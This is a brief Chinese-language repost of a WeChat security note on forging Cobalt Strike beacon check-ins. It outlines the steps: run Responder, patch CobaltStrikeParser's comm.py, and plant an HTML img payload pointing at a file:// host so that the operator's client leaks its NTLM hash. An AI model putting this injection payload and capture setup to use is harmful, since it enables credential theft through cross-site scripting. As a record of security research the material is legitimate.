Jas502n大佬的思路
使用此工具建立监听:https://github.com/lgandx/Responder
https://github.com/Sentinel-One/CobaltStrikeParser/
修改 comm.py 第39行,为payload:<html>< img src=’file://x.x.x.x/xx’%>
伪造上线
CS上线,user 处为我们设置的 payload
Responder 脚本抓到客户机 hash
原文始发于微信公众号(刨洞技术交流):CobaltStrike XSS利用新姿势